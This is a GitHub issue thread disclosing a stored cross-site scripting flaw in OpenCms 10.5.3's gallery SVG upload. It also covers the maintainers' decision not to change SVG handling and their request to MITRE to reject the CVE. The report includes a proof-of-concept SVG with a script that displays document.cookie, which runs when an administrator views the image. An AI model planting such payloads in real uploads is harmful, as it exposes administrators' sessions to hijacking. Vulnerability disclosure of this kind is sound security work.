Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored Cross Site Scripting via SVG image upload in Gallery Functionality #587

Closed
MrR3boot opened this issue Mar 20, 2018 · 13 comments
Closed

Comments

@MrR3boot
Copy link

Dear Team, i would like to report persistent xss vulnerability in latest release. Mitre.org assigned a CVE ID for this.

Description:

Cross Site Scripting (XSS) Vulnerability in Gallery functionality in OpenCMS 10.5.3 allows remote attackers to execute arbitrary web script via crafted svg image.

Steps to Reproduce:

  1. Login as user who is having Gallery Editor role.
  2. Navigate to gallery and upload below svg file.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
  1. Once other user who is having Root Administrator permissions visited the image link or viewed the uploaded svg image the script get executed.

Fix:

Input file validation

Affected Version:

10.5.3 latest release

@MrR3boot
Copy link
Author

Any Update

@tHerrmann
Copy link

Hi, we are currently discussing if this issue is relevant. As users of roles lesser than Root Administrator are able to edit HTML source code, they are allowed to add script tags to pages anyway. No need to use any SVG for that.
OpenCms is used to maintain any kind of web site, so it is required, that users are able to add JavaScript to the generated pages.

@MrR3boot
Copy link
Author

Ok. I'll agree with you.

@aKandzior
Copy link
Member

We take this issue very seriously! However, we have to find a way to make sure to have a balance so that users still can use this SVG feature if they need it, while at the same time prevent users (that have an editor account on the system) can not upload "malicious" content.

@MrR3boot
Copy link
Author

Absolutely right. Implementation of validation on uploaded SVG content will reduce the risk. Try to avoid uploading an SVG which is having malicious script tags or perform additional checks while displaying the SVG Content back on application.

@MrR3boot
Copy link
Author

Hi, Can i get exact ETA for this fix.

@aKandzior
Copy link
Member

We are still considering the best way to proceed here. We normally do not like to modify content uploaded by registered users. Perhaps the better option is to allow only “trusted” users to upload content anyway.

@tHerrmann
Copy link

We decided to refrain from changing the handling of SVG images. OpenCms administrators have the option to assign the right to upload resources to trusted users only. The same way, they may allow trusted users to add JavaScript directly to a page.

@tHerrmann
Copy link

No, that is not related. This issue concerns SVG files uploaded into OpenCms by registered users.
The TinyMCE issue relates to SVG data pasted into the TinyMCE source code editor as a data URL.

@NicoleG25
Copy link

@aKandzior was this issue ever addressed? and if so could you kindly point out where it was fixed?

Cheers !

@aKandzior
Copy link
Member

Please see the comment from @tHerrmann dated Sep. 25 2018 above.

@NicoleG25
Copy link

@aKandzior understood.
Do you plan to contact MITRE to reject the CVE assigned to this vulnerability ?

@aKandzior
Copy link
Member

I have submitted a request for rejection to MITRE with the following description:

CVE-2018-8811 is linked to https://www.exploit-db.com/exploits/44392
Both entries point to each other as sources.
The only external source is the GitHub issue description
#587.

Rational for rejection:
OpenCms, the product in question, is a web CMS system.
It allows only registered (!) users to upload different kind of content artifacts (SVG, .doc, .docx) etc.

The uploaded content is stored in the CMS content repository "as is".
In case of scripts inside an SVG, this may or may not be "malicious", there is no way of knowing if the uploaded SVG contains the script for a reason.

It should be pointed out that to exploit the "issue", a user must have an account (!) in the CMS as a content manager. Moreover, uploads and other changes in the CMS content repository are logged with the user name / id.

https://www.exploit-db.com/exploits/44392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8815

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants